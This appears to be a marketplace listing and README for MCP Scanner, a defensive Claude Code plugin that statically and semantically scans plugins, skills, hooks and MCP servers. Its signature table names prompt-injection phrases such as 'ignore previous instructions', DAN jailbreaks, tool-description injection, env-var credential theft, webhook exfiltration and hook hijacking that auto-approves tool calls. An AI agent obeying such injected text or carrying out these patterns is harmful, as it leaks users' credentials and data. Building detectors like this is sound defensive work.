Stats
Actions
Available In
Tags
'%20stop-opacity%3D'0.16'%2F%3E%3Cstop%20offset%3D'1'%20stop-color%3D'rgb(200%2C90%2C60)'%20stop-opacity%3D'0.03'%2F%3E%3C%2FlinearGradient%3E%3C%2Fdefs%3E%3Crect%20width%3D'320'%20height%3D'200'%20fill%3D'url(%23g)'%2F%3E%3Ccircle%20cx%3D'250'%20cy%3D'56'%20r%3D'92'%20fill%3D'rgb(200%2C90%2C60)'%20fill-opacity%3D'0.06'%2F%3E%3Ccircle%20cx%3D'64'%20cy%3D'172'%20r%3D'58'%20fill%3D'rgb(200%2C90%2C60)'%20fill-opacity%3D'0.05'%2F%3E%3C%2Fsvg%3E)
Scans plugins, skills, hooks, and MCP servers for security threats before use. Detects prompt injection, data exfiltration, credential theft, obfuscation, and more.
Export a plugin security scan report as formatted markdown
Export a plugin scan report in SARIF 2.1.0 format for CI/IDE integration
Safely install a plugin with pre-installation security scanning
Scan all installed plugins and marketplace plugins for security threats
Scan only changed files in a plugin for new security threats
Executes bash commands
Hook triggers when Bash tool is used
Modifies files
Hook triggers on file write and edit operations
Runs pre-commands
Contains inline bash commands via ! syntax
Own this plugin?
Verify ownership to unlock analytics, metadata editing, and a verified badge. GitHub access is read-only (username + org membership).
Sign in to claimOwn this plugin?
Verify ownership to unlock analytics, metadata editing, and a verified badge. GitHub access is read-only (username + org membership).
Sign in to claimBased on adoption, maintenance, documentation, and repository signals. Not a security audit or endorsement.
Bash prerequisite issue
Uses bash pre-commands but Bash not in allowed tools
Bash prerequisite issue
Uses bash pre-commands but Bash not in allowed tools
Security scanner plugin for Claude Code. Scans plugins, skills, hooks, and MCP servers for threats before you use them.
Agents using Claude Code can be compromised through malicious plugins — prompt injection in tool descriptions, data exfiltration via webhooks, credential theft from environment variables, and obfuscated payloads. Per Snyk's ToxicSkills study, 36% of agent skills have at least one security flaw. MCP Scanner detects these threats using static analysis combined with Claude's semantic analysis.
git clone https://github.com/digitaltitann/mcp-scanner ~/.claude/plugins/mcp-scanner
On Windows:
git clone https://github.com/digitaltitann/mcp-scanner $env:USERPROFILE\.claude\plugins\mcp-scanner
No dependencies required — Python stdlib only.
/scan-plugin ~/.claude/plugins/some-plugin
Or ask naturally: "Is this plugin safe?"
/scan-all
/scan-mcp
/install-plugin https://github.com/user/some-plugin
/export-report ~/.claude/plugins/some-plugin
/scan-diff ~/.claude/plugins/some-plugin
/scan-diff ~/.claude/plugins/some-plugin --since HEAD~1
/scan-remote user/plugin-repo
/scan-remote https://github.com/user/plugin-repo --branch dev
Requires the gh CLI to be installed and authenticated.
/scan-history --show
/scan-history --trends
/scan-history --stats
/scan-permissions ~/.claude/plugins/some-plugin
/scan-permissions --all
Shows what each plugin can access: hooks, network, env vars, filesystem, subprocesses.
/export-sarif ~/.claude/plugins/some-plugin -o report.sarif
SARIF 2.1.0 output works with GitHub Code Scanning, VS Code SARIF Viewer, and CI pipelines.
81 built-in signatures across 11 threat categories (expandable to 145+ with the community signature feed):
| Category | Examples |
|---|---|
| Prompt Injection | "ignore previous instructions", <IMPORTANT> tag injection, "MANDATORY: ALWAYS CALL", DAN jailbreaks |
| Data Exfiltration | requests.post with env vars, fetch() + POST, DNS exfiltration, clipboard access |
| Code Execution | eval(), exec(), subprocess(shell=True), child_process.exec() |
| Credential Theft | os.environ["API_KEY"], SSH key access, bulk env var dumps, suspicious env var names |
| Known Malicious | 7 fingerprinted attack tools from security research (promptfoo, Invariant Labs, DVMCP) |
| Network Abuse | HTTP instead of HTTPS, hardcoded IPs, connections to webhook.site/pastebin/ngrok |
| Obfuscation | base64 decode + exec, hex-encoded payloads, String.fromCharCode chains |
| File System Abuse | directory traversal, symlink attacks, .bashrc modification, crontab creation |
| Over-Broad Permissions | allowed-tools: *, wildcard MCP tools |
| Hook Hijacking | auto-approving tool calls, modifying tool inputs, session tracking |
| Rug Pull Detection | runtime docstring swaps, trigger file checks for delayed activation |
Two-phase scanning:
Static analysis — Python regex scanner runs fast pattern matching across all files. Checks line-by-line patterns, multi-line patterns, MCP configs, hook configs, file structure, known malicious signatures, and dependencies.
Semantic analysis — Claude reads flagged files and performs deeper analysis that regex can't do: context-dependent risk assessment, indirect prompt injection, combined pattern escalation (credential access + network call = CRITICAL).
Risk levels:
Three layers of ongoing protection:
Automatically runs at every Claude Code session start. Checksums all installed plugins and compares against a stored baseline. If any plugin is new or has changed files, runs the scanner and warns you.
Scheduled full scan of all plugins with JSON reports.
# Install as daily scheduled task (Windows, runs at 8 AM)
python ~/.claude/plugins/mcp-scanner/scripts/daily_scan.py --install
# Run manually
python ~/.claude/plugins/mcp-scanner/scripts/daily_scan.py
# Remove scheduled task
python ~/.claude/plugins/mcp-scanner/scripts/daily_scan.py --uninstall
Reports are saved to ~/.claude/mcp-scanner-reports/scan-YYYY-MM-DD.json with 30-day retention.
npx claudepluginhub digitaltitann/mcp-scannerOffline security scanner for AI-agent repos, skills, plugins, and MCP servers
alexgreenshSpecialized security review subagent
jeremylongshoreSafety for Agents - Agent Detection & Response (ADR) for AI agents
gendigitalincSecurity reminder hook that warns about potential security issues when editing files, including command injection, XSS, and unsafe code patterns
EricGrillComprehensive skill pack with 66 specialized skills for full-stack developers: 12 language experts (Python, TypeScript, Go, Rust, C++, Swift, Kotlin, C#, PHP, Java, SQL, JavaScript), 10 backend frameworks, 6 frontend/mobile, plus infrastructure, DevOps, security, and testing. Features progressive disclosure architecture for 50% faster loading.
JeffallanHarness-native ECC plugin for engineering teams - 67 agents, 271 skills, 92 legacy command shims, reusable hooks, rules, MCP conventions, and operator workflows for Claude Code plus adjacent agent harnesses
affaan-m